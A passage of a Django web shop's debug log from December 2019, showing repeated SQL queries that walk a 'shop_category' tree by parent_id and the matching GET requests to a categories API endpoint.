"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:09:28,230 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:09:28,232 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:09:28,234 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:09:28,236 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:09:28,238 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:09:28] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:10:48,650 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:10:48,654 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:10:48,657 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:10:48,659 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:10:48,662 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:10:48,664 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:10:48,666 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:10:48,668 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:10:48,670 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:10:48,673 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:10:48,675 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:10:48] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:11:25,303 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:11:25,308 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:11:25,311 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:11:25,313 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:11:25,315 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:11:25,317 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:11:25,319 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:11:25,322 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:11:25,324 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:11:25,326 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:11:25,329 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:11:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:11:55,608 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:11:55,612 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:11:55,615 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:11:55,617 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:11:55,619 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:11:55,621 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:11:55,624 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:11:55,626 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:11:55,628 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:11:55,630 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:11:55,632 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:11:55] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:12:28,355 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:12:28,360 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:12:28,362 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:12:28,364 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:12:28,366 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:12:28,368 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:12:28,370 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:12:28,372 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:12:28,375 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:12:28,377 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:12:28,379 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:12:28] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:15:45,926 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:15:45,934 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:15:45,938 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:15:45,942 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:15:45,946 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:15:45,950 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:15:45,954 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:15:45,958 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:15:45,962 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:15:45,966 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:15:45,970 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:15:45] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:16:16,510 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:16:16,518 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:16:16,522 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:16:16,526 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:16:16,530 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:16:16,534 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:16:16,537 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:16:16,539 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:16:16,542 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:16:16,545 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", 